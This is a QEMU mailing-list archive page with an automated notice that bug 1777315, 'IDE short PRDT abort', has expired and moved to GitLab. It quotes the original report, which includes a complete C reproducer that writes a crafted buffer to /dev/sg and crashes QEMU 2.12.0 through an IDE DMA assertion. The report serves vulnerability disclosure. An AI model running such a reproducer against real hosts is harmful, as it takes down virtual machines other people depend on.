qemu-devel
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Bug 1777315] Re: IDE short PRDT abort

From: Thomas Huth
Subject: [Bug 1777315] Re: IDE short PRDT abort
Date: Fri, 30 Apr 2021 16:57:15 -0000 
This is an automated cleanup. This bug report has been moved
to QEMU's new bug tracker on gitlab.com and thus gets marked
as 'expired' now. Please continue with the discussion here:

 https://gitlab.com/qemu-project/qemu/-/issues/57


** Changed in: qemu
       Status: In Progress => Expired

** Changed in: qemu
     Assignee: John Snow (jnsnow) => (unassigned)

** Bug watch added: gitlab.com/qemu-project/qemu/-/issues #57
   https://gitlab.com/qemu-project/qemu/-/issues/57

-- 
You received this bug notification because you are a member of qemu-
devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1777315

Title:
  IDE short PRDT abort

Status in QEMU:
  Expired

Bug description:
  Hi,
  QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version 
qemu-2.12.0

  run the program in qemu-2.12.0:
  #define _GNU_SOURCE 
  #include <endian.h>
  #include <sys/syscall.h>
  #include <unistd.h>
  #include <fcntl.h>
  #include <stdio.h>
  #include <string.h>
  #include <sys/stat.h>
  #include <stdint.h>
  #include <string.h>

  static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
  {
          if (a0 == 0xc || a0 == 0xb) {
                  char buf[128];
                  sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", 
(uint8_t)a1, (uint8_t)a2);
                  return open(buf, O_RDWR, 0);
          } else {
                  char buf[1024];
                  char* hash;
  strncpy(buf, (char*)a0, sizeof(buf) - 1);
                  buf[sizeof(buf) - 1] = 0;
                  while ((hash = strchr(buf, '#'))) {
                          *hash = '0' + (char)(a1 % 10);
                          a1 /= 10;
                  }
                  return open(buf, a2, 0);
          }
  }

  uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
  void loop()
  {
          long res = 0;
  memcpy((void*)0x20000000, "/dev/sg#", 9);
          res = syz_open_dev(0x20000000, 0, 2);
          if (res != -1)
                  r[0] = res;
          res = syscall(__NR_dup2, r[0], r[0]);
          if (res != -1)
                  r[1] = res;
  *(uint8_t*)0x20000ec0 = 0;
  *(uint8_t*)0x20000ec1 = 0;
  *(uint8_t*)0x20000ec2 = 0;
  *(uint8_t*)0x20000ec3 = 0;
  *(uint32_t*)0x20000ec8 = 0;
  *(uint8_t*)0x20000ed8 = 0;
  *(uint8_t*)0x20000ed9 = 0;
  *(uint8_t*)0x20000eda = 0;
  *(uint8_t*)0x20000edb = 0;
  memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 
12);
          syscall(__NR_write, r[1], 0x20000ec0, 0x323);
  }

  int main()
  {
          syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
          loop();
          return 0;
  }
  this will crash qemu, output information:
   qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == 
s->sg.size' failed.

  
  Thanks 
  owl337

To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions
reply via email to
[Prev in Thread] Current Thread [Next in Thread]